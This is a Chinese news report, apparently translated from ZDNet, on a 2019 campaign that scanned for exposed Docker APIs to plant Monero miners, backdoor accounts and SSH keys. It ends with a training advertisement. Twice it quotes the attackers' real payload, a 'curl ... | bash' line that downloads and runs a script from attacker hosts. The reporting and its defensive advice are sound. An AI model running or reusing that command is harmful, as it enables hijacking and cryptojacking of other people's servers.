某黑客组织目前正在互联网上进行大规模扫描,旨在寻找各类将API暴露在公开网络之上的Docker平台。通过扫描,黑客组织能够向这些暴露的Docker实例发出命令,从而在企业Docker实例当中部署加密货币矿工程序,最终神不知鬼不觉地利用他人算力为自己开采代币。
本轮扫描始于今年11月24日,是周末,由于规模极为庞大,因此甫一启动即吸引到众多安全人士的关注。Bad Pockets公司联合创始人兼首席研究官Troy Mursch在采访中表示,“Bad Packets CTI API的用户应该很了解,针对暴露Docker实例的恶意活动并不是什么新鲜事物,而且发生频率很高。”他指出,“此次扫描的特别之处在于,其扫描规模极为夸张。单此一项,就值得我们投入精力调查攻击者到底想利用僵尸网络搞什么名堂。”作为本轮扫描行为的发现者,Mursch表示“亦有其他关注者指出,这样的规模绝不是那种脚本小子们的儿童把戏。恶意者在此轮扫描当中投入了大量精力,而且截至目前,我们还没有彻底搞清楚对方到底想干什么。”此次随机大规模扫描已经检测出大量公开在公共互联网上的Docker API端点。此轮扫描利用Alpine Linux镜像创建一套容器,同时执行以下负载:"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel
——Bad Packets Report (@bad_packets) 2019年11月25日
截至目前,我们能够确定的是,发动攻击的集团正在扫描超过59000个IP网络(网络块)以寻找暴露的Docker实例。在该集团发现暴露主机后,攻击者会利用该API端点启动一套Alpine Linux OS容器,进而执行以下命令:chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;
以上命令用于从攻击者服务器处下载并运行一份Bash脚本。此脚本会在目标设备上安装经典的XMRRig加密货币采矿程序。Mursch指出,此次活动刚刚启动两天,黑客方面已经股票市场出14.82枚门罗币(XMR),价值约为740美元。Mursch在采访中指出,“虽然并非原创,但我们在活动中也观察到一种有趣的情况。攻击者通过下载自http://ix[.]io/1XQh的脚本制裁了已知监视代理程序并关闭了大量相关进程。”查看这份脚本,我们发现黑客不仅在尝试禁用安全产品,同时也关闭掉了LSO进程——此进程可能被其他黑客竞争对手的加密货币采矿僵尸网络(例如DDG)所利用。此外,Mursch发现该恶意脚本还会扫描受感染主机以查找rConfig配置文件,对其进行窃取与加密,并将文件发送回黑客集团的命令与控制服务器。Sandfly Security公司创始人Craig H. Rowland则注意到,这批黑客会在成功入侵的容器当中创建后门账户,同时保留SSH密钥以待后续访问。如此一来,他们即可通过远程位置控制所有被感染的肉鸡目标。Mursch给出的建议是,各位运行Docker实例的用户及组织应立即检查自己是否在互联网上公开了API端点,如果有请立即将其关闭,而后关停一切无法识别的运行中容器。原文链接:https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/
Kubernetes入门与实战培训将于2019年11月29日在深圳开课,3天时间带你系统掌握Kubernetes,学习效果不好可以继续学习。本次培训包括:云原生介绍、微服务;Docker基础、Docker工作原理、镜像、网络、存储、数据卷、安全;Kubernetes架构、核心组件、常用对象、网络、存储、认证、服务发现、调度和服务质量保证、日志、监控、告警、Helm、实践案例等等,点击下方图片或者阅读原文链接查看详情。
